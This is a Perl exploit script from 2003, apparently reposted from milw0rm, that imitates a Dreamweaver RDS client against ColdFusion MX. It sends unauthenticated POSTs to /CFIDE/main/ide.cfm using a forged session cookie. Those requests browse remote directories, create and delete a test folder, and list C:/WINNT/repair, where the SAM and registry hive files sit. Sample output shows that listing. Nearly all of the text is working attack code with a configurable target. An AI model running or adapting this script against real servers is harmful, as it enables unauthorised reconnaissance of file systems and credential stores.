
ColdFusion MX - Remote Development Service

Jan 27th, 2024
  1. #!/usr/bin/perl
  2. # RDS_c_Dump.pl
  3. # By angry packet
  4.  
  5. ##
  6. #     THIS WAS AN UNPATCHED VULNERABILITY AT THE TIME OF WRITING (July 2003, per the milw0rm date at the end of this file) - do not assume that still holds for whatever ColdFusion release you are looking at today.
  7. #
  8. # ColdFusion 6 MX Server does several things in order to get the remote directory structure, so we need
  9. # to recreate these steps. This is an "almost" complete emulation of a Dreamweaver client connection,
  10. # roughly one full HTTP/1.1 session as you would see it in a netcat capture.
  11. #
  12. # Note that the ASPSESSIONID cookie is never validated by the server, so the hard-coded Cookie value sent below can be changed on the fly.
  13. #
  14. # Due to certain current situations I am not allowed to release full exploit code with
  15. # ( READ, RETRIEVE, WRITE ) functions.
  16. #
  17. # Sample output:
  18. # --------------------------------
  19. # Vic7im1@cipher:~/Scripts/RDS_Sploit$ perl RDS_c_Dump.pl
  20. #
  21. # POST /CFIDE/main/ide.cfm?CFSRV=IDE&ACTION=BrowseDir_Studio HTTP/1.1
  22. #
  23. # Request String Value: 3:STR:15:C:/WINNT/repairSTR:1:*STR:0:
  24. # Content-Length: 37
  25. # Please wait.. ..
  26. # HTTP/1.1 100 Continue
  27. # Server: Microsoft-IIS/5.0
  28. # Date: Tue, 01 Jul 2003 10:30:43 GMT
  29. #
  30. # HTTP/1.1 200 OK
  31. # Server: Microsoft-IIS/5.0
  32. # Date: Tue, 01 Jul 2003 10:30:43 GMT
  33. # Connection: close
  34. # Content-Type: text/html
  35. #
  36. # 50:2:F:11:autoexec.nt1:63:4383:0,02:F:9:config.nt1:64:25773:0,02:F:7:default1:66:1187843:0,
  37. # 02:F:10:ntuser.dat1:66:1187843:0,02:F:3:sam1:65:204803:0,
  38. # 02:F:12:secsetup.inf1:66:5735303:0,02:F:8:security1:65:286723:0,
  39. # 02:F:9:setup.log1:66:1551943:0,02:F:8:software1:67:65331203:0,02:F:6:system1:66:9748483:0,0
  40. # Vic7im1@cipher:~/Scripts/RDS_Sploit$
  41. # ----------------------------------
  42.  
  43.  
use strict;
use warnings;
use IO::Socket;

use vars qw($response @clength @rarray);
  48.  
  49. ## Dreamweaver string requests to ide.cfm
  50. ## --------------------------------------
  51. #1:  3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:         Content-Length: 46
  52. #2:  3:STR:7:C:/_mm/STR:1:*STR:0:                   Content-Length: 28
  53. #3:  3:STR:6:C:/_mmSTR:9:ExistenceSTR:0:STR:0:STR:0:        Content-Length: 47
  54. #4:  3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:         Content-Length: 46
  55. #5:  3:STR:10:C:/_notes/STR:1:*STR:0:                   Content-Length: 32
  56. #6:  5:STR:9:C:/_notesSTR:9:ExistenceSTR:0:STR:0:STR:0      Content-Length: 50
  57. #7:  3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:         Content-Length: 46
  58. #8:  5:STR:12:C:/XYIZNWSK/STR:6:CreateSTR:0:STR:0:STR:0:    Content-Length: 51
  59. #9:  3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:     Content-Length: 46
  60. #10: 3:STR:3:C:/STR:1:*STR:0:                   Content-Length: 24
  61. #11: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:     Content-Length: 46
  62. #12: 5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:  Content-Length: 53
  63. #13: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:     Content-Length: 46
  64. #14: 5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:  Content-Length: 53
  65. #15: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:     Content-Length: 46
  66. #16: 5:STR:11:C:/XYIZNWSKSTR:6:RemoveSTR:0:STR:0:DSTR:0:    Content-Length: 51
  67. #17: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:     Content-Length: 46
  68. #18: 3:STR:8:C:/WINNTSTR:1:*STR*STR:0:              Content-Length: 29
  69. #19: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:     Content-Length: 46
  70. #20: 3:STR:15:C:/WINNT/repairSTR:1:*STR:0:          Content-Length: 37
  71.  
  72.  
  73. # Static Content-Length headers, paired by index with the request strings in @rarray. Each value is the
  74. # byte length of the matching request string; if you point the dump somewhere other than C:\WINNT\repair
  75. # you will need to recompute the length for that entry (a wrong length desynchronises the server's read).
  75. @clength = ( "Content-Length: 46",
  76.          "Content-Length: 28",
  77.          "Content-Length: 47",
  78.          "Content-Length: 46",
  79.              #"Content-Length: 32",
  80.          #"Content-Length: 50",
  81.          "Content-Length: 46",
  82.          "Content-Length: 51",
  83.          "Content-Length: 46",
  84.          "Content-Length: 24",
  85.          "Content-Length: 46",
  86.          "Content-Length: 53",
  87.          "Content-Length: 46",
  88.          "Content-Length: 53",
  89.          "Content-Length: 46",
  90.          "Content-Length: 51",
  91.          "Content-Length: 46",
  92.          "Content-Length: 29",
  93.          "Content-Length: 46",
  94.          "Content-Length: 37"
  95.        );
  96.  
  97.  
  98. @rarray = ( "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
  99.         "3:STR:7:C:/_mm/STR:1:*STR:0:",
  100.         "3:STR:6:C:/_mmSTR:9:ExistenceSTR:0:STR:0:STR:0:",
  101.         "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
  102.         #"3:STR:10:C:/_notes/STR:1:*STR:0:",
  103.         #"5:STR:9:C:/_notesSTR:9:ExistenceSTR:0:STR:0:STR:0",
  104.         "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
  105.         "5:STR:12:C:/XYIZNWSK/STR:6:CreateSTR:0:STR:0:STR:0:",
  106.         "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
  107.         "3:STR:3:C:/STR:1:*STR:0:",
  108.         "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
  109.         "5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:",
  110.         "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
  111.         "5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:",
  112.         "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
  113.         "5:STR:11:C:/XYIZNWSKSTR:6:RemoveSTR:0:STR:0:DSTR:0:",
  114.         "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
  115.         "3:STR:8:C:/WINNTSTR:1:*STR*STR:0:",
  116.         "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
  117.         "3:STR:15:C:/WINNT/repairSTR:1:*STR:0:"
  118.         );
  119.  
  120.  
  121.  
  122. system("clear");
  123. # change target addy below.
  124. my $TARGET = "192.168.0.100";
  125. my $PORT = "80";
  126. my $STRING = "C:/WINNT/repair";
  127. my $POST = "POST /CFIDE/main/ide.cfm?CFSRV=IDE&ACTION=BrowseDir_Studio HTTP/1.1\r\n";
  128.  
  129.  
  130. print "Generating Socket with Array Directory Values.\n";
  131. my ( $i, $c);
  132. for ( $i = 0; $i < @rarray; $i++  ) {
  133.     for ( $c = 0; $c < @clength; $c++ ) {  
  134.             if( $i == $c ) {
  135.             &gen_sock($TARGET, $PORT, $rarray[$i], $clength[$c]);
  136.         }
  137.     }
  138. }
  139.  
  140.  
  141. sub gen_sock() {
  142.     my $sock = new IO::Socket::INET(PeerAddr => $TARGET,
  143.                     PeerPort => $PORT,
  144.                     Proto    => 'tcp',
  145.                     );
  146.     die "Socket Could not be established ! $!" unless $sock;
  147.     print "Target: $TARGET:$PORT\n";
  148.     print "$POST\n";
  149.     print "Request String Value: $rarray[$i]\n";
  150.     print "$clength[$c]\n";
  151.     print "Please wait.. ..\n";
  152.     print $sock "$POST";
  153.     print $sock "Content-Type: application/x-ColdFusionIDE\r\n";
  154.     print $sock "User-Agent: Dreamweaver-RDS-SCM1.00\r\n";
  155.     print $sock "Host: $TARGET\r\n";
  156.     print $sock "$clength[$c]\r\n";
  157.     print $sock "Connection: Keep-Alive\r\n";
  158.     print $sock "Cache-Control: no-cache\r\n";
  159.     print $sock "Cookie: ASPSESSIONIDQQQQGLDK=LPIHIKCAECKACDGPJCOLOAOJ\r\n";
  160.     print $sock "\r\n";
  161.     print $sock "$rarray[$i]";
  162.    
  163.     # lets return and print data to term
  164.     while($response = <$sock>) {
  165.         chomp($response);
  166.         print "$response\n";
  167.     }
  168.     close($sock);
  169. }
  170.  
  171. # milw0rm.com [2003-07-07]
  172.            